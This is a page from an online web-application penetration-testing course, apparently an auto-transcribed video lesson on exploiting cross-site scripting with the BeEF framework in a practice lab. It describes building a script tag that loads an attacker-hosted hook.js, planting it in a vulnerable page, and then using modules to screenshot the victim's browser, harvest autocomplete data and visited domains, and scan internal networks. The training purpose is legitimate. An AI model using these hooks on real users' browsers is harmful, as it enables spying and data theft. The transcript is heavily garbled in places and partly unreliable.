Time
4 hours 20 minutes
Difficulty
Intermediate
CEU/CPE
5

Video Description

This lesson covers exploiting XSS using the BEEF tool. BEEF is a multi-step process which allows an attacker to take control of victim's browser.

Video Transcription

00:04
next, we're gonna use a tool called beef.
00:06
Beef is a tool which allows you to gain control over somebody's
00:11
browser.
00:13
It's very dangerous,
00:15
but there's a couple of steps we have to do
00:18
in order to
00:20
exploit
00:21
the vulnerability.
00:23
So first we'll need to build a malicious code.
00:26
Next, we have to make the girl, then finally said that you were all to a victim on 1/4 step profit.
00:34
So first, we're gonna start the beef application
00:38
from the applications Exploitation Tools menu.
00:41
Then after that, we're gonna browse to 1270.0 dot one with Port
00:47
3000
00:49
force less. You lie four slash authentication and the user name and password will be beef. So you could do that.
01:00
So good applications
01:04
exploitation tools
01:08
on beef excess framework.
01:11
Now, let's go over to our, uh we brought our
01:15
browser here,
01:25
Type you I authentication and we have our beef page.
01:30
So using a thief
01:33
for the password of beef
01:38
and we're now in
01:40
now our hook
01:42
is
01:44
here's an example of what the hook would be.
01:48
Now,
01:49
if you were attacking somebody, you would put your i P address in here.
01:53
The port 3000 hook that J s and you would send it to them.
01:59
Next, The malicious code will be need to be crafted. I do. That is, script source equals attacker I P
02:05
Port 3000 hooked at J s. This line could be family. You initially start beef up.
02:10
So you started up. You get hook an example. So the hook,
02:15
Well, then I need to be delivered.
02:17
This would be done by placing a horrible feel like we did with our prior example. Or it could be delivered
02:23
via a link. So you can either place it in a foreign field on as users go to that web page. They just keep getting hit one by one and just keep
02:35
becoming bots to beef, which is very dangerous.
02:38
However, if you just want to do a one off, you just send until one person boom, they get hit has an excellent tool
02:46
to test just how far somebody can interact with your network. So if you think oh, my intrusion prevention system are my intrusion detection system will stop somebody for being able to do this, test it out, see if somebody on the outside
03:02
can communicate and control somebody's Web browser from the inside of your network.
03:07
And then after we deliver the code, we're gonna wait for the victim to browse the site. And then once they dio, you'll get a confirmation we've shown here
03:15
in the browsers. So let's go
03:17
put that
03:19
malicious link
03:21
into the Web page, Browse to it on and see if we become a hoax browser. Alright, here we are, on the beef control panel. We can see that if there was any online browsers, they would show up here.
03:32
These are all the off lamb browsers. So
03:37
if you did have, ah,
03:39
a computer hooked at one time, that information will stay here for you
03:46
to be ableto
03:49
communicate with or attempt to communicate with another time. All right, so let's come back over to pen Tester Labs
03:55
and we're gonna put it in our script here.
04:00
May I? P address will be our local i p address of 192.168
04:05
That zero that 10.
04:08
Let's submit this query. Let's actually keep this and see what happens
04:13
when we get the poplar from before.
04:15
And I'm sure some of this information to be sent over now
04:18
Oh, look at that. We have a hoax browser
04:30
with this Hook browser. We can see all kinds of different information about it,
04:33
including the cookie hosts I p address.
04:39
So we know it's coming from
04:41
what websites coming from a pen tester lab's website in the I p. Just the websites coming from you, all kinds of nifty information.
04:48
So it's very, very awesome information you can get from this.
04:54
Now we have all these different awesome pieces of information about this
05:00
person
05:00
who is Ah,
05:02
I executed
05:03
this exploit. So
05:05
one thing we can do is with me wherever your logs, you see different events that have happened.
05:12
We also come over here to commands.
05:14
Now commands are a pretty awesome tool
05:18
because the commands less to do all of different things. For example, if we have a webcam hooked up to the browser,
05:27
we can actually take a picture through the individuals webcam we're using ah VM environment. So you will have to actually go into your
05:34
virtual environment system settings up at the top
05:42
and add USB device. If you want to be able, Thio, take a picture through your V m.
05:49
However, we're not gonna bother with all of that right now. So we do stuff on here.
05:55
That is Ah, it's pretty awesome. So we could play a sound of somebody over there.
06:00
Browser or weaken, do more malicious things.
06:13
Things like attempting a browser exploitation automatically
06:17
or running a bunch of different
06:20
cross site scripting
06:23
exploits.
06:25
I got it. The individual.
06:27
It's green.
06:28
It means that that
06:30
person is vulnerable to it. If it's orange, you might be able to get it. If it's red year,
06:35
probably not gonna get it.
06:47
You could also do this to get network information as well. You do Pink Sweet sweeps internally on something. So if you want to get further information on somebody's network, you could have them
07:00
go to this page
07:01
or go to a link that you have this exploit set up at. Then you can get further information about the persons
07:10
internal network.
07:15
There's also social engineering tools in here as well. If you want to try to use
07:18
social engineering tools against individuals
07:24
in your network who you may be auditing,
07:29
so how do you use when these tools Well,
07:31
what's the text of extensions?
07:35
So you click on the item
07:39
and then you click Execute. Now it checks for Google Chrome Mozilla Firefox So we're not gonna get anything back really? For this one. But we see the command execute here.
07:48
And if you could go on and you'll get the command results
07:53
So let's, uh let's try to get
07:56
u R l Is that we've gone too.
07:59
So get visited. Your l's
08:01
execute come up here
08:05
and it's not an avant browser. So it did not work. But we can attempt, get visit domains. Let's execute that.
08:13
I'm a beer and executes.
08:24
We see pen testing labs freaking out up here because
08:28
our current
08:30
program beef
08:31
application here is
08:35
trying to
08:37
basically go back and go over all of the different things that we've gone to. Look at that.
08:43
We've got a whole bunch of different domains, um,
08:50
many of which are false results.
09:01
Wow, Really?
09:03
It's just it's getting us onto that one.
09:13
So let's execute one of these. So we're gonna come over here, we're gonna click Spider on me.
09:20
We're gonna execute this, takes a picture of the victim's browser,
09:22
come over here to command one. Then we're gonna see the results.
09:28
It may take a second floor of the results to show up.
09:31
So after you collect something, do not necessarily just give up real quick because they will take a moment if it doesn't work the first time,
09:39
which it may not
09:43
re executed a couple times on a CV game results.
09:50
There we go.
09:52
Fourth attempt. We had
09:54
I have a picture of the block. So this isn't it
09:58
an excellent option to be able to steal
10:01
things that the person might have tighter might have up on their their browser at that time, which is
10:07
pretty dangerous.
10:54
You can also attempt to steal any auto completes as well, so we can click execute on here, and we're gonna trust you only auto complete.
11:03
That may have been Ah,
11:07
one that browser.
11:07
Probably if I have, uh,
11:11
put any auto completes in. So it's dropped down here.
11:16
Uh, do name.
11:16
We'll execute that one.
11:24
Um,
11:28
do use your name or email,
11:33
email.
11:35
So let's see if we get anything back. Command results got nothing for that one. Nothing
12:11
local thing about this is you can use it to test and find different
12:16
type of adults that may be on the browser as well. So I know I have fire below. I know I have firebug.
12:22
Let's do a detect here and see if it could find a firebug.
12:26
So it executes from over here Command, too. And look at that.
12:31
Firebug is enabled and in use.
12:35
So lots of things you can do with this
12:37
Definitely
12:39
see how far you can get with this tool.
12:41
Keep poking around and, uh, try it out because it's awesome. All the different things you can. D'oh!
12:52
We also have the server itself here hooked.
12:56
So you can also do commands against the server
13:01
itself and trying information
13:03
from that Web server even further.
13:05
So, yeah,
13:07
Did you get out? It's awesome.
13:09
So it was covered Well recovered how to exploit cross site scripting manually
13:13
using redirection and cookie theft. And then we also covered how to exploit cross site scripting with beef. Not be acting, everyone

Up Next

Web Application Penetration Testing

In this web application penetration testing course, SME, Raymond Evans, takes you on a wild and fascinating journey into the cyber security discipline of web application pentesting. This is a very hands-on course that will require you to set up your own pentesting environment.

Instructed By

Instructor Profile Image
Raymond Evans
Instructor